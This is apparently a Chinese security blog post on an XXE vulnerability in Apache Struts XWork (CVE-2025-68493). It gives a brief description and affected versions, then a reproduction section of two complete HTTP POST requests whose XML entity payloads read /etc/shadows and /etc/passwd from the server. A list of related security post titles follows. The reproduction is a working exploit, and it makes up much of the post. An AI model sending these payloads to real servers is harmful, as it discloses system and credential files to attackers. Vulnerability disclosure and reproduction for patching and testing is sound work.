Apache Struts XWork 组件 XXE 漏洞(CVE-2025-68493)[已复现]

一、漏洞介绍

Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。

Apache Struts的XWork组件在解析XML配置文件时未对输入进行充分的安全校验,攻击者可通过提交恶意XML文档,诱使服务器在解析过程中加载文件触发漏洞。成功利用漏洞的攻击者,可获取目标服务器敏感信息或导致服务器拒绝服务。

二、影响版本

2.0.0 <= Struts <= 2.3.37 (EOL)

2.5.0 <= Struts <= 2.5.33 (EOL)

6.0.0 <= Struts <= 6.1.0

三、漏洞复现

复制代码
POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1
...
Content-Length: 101
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/shadows">]>
<root>&xxe;</root>
复制代码
POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1
...
Content-Length: 101
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
相关推荐
SuperherRo11 天前
服务攻防-开发框架安全&ThinkPHP&Laravel&SpringBoot&Struts2&SpringCloud&复现
spring boot·laravel·thinkphp·struts2·框架安全
bjzhang7514 天前
Linux曝出“核弹级”漏洞CVE-2026-31431:攻击者可瞬间提权
linux·漏洞·提权·cve-2026-31431
菩提小狗15 天前
每日安全情报报告 · 2026-05-02
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗15 天前
每日安全情报报告 · 2026-05-05
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗17 天前
每日安全情报报告 · 2026-05-03
网络安全·漏洞·cve·安全情报·每日安全
ybdesire18 天前
间接提示词注入真实样例鉴赏
网络安全·语言模型·漏洞·漏洞分析
菩提小狗19 天前
每日安全情报报告 · 2026-05-01
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗20 天前
每日安全情报报告 · 2026-04-30
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗21 天前
每日安全情报报告 · 2026-04-27
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗21 天前
每日安全情报报告 · 2026-04-29
网络安全·漏洞·cve·安全情报·每日安全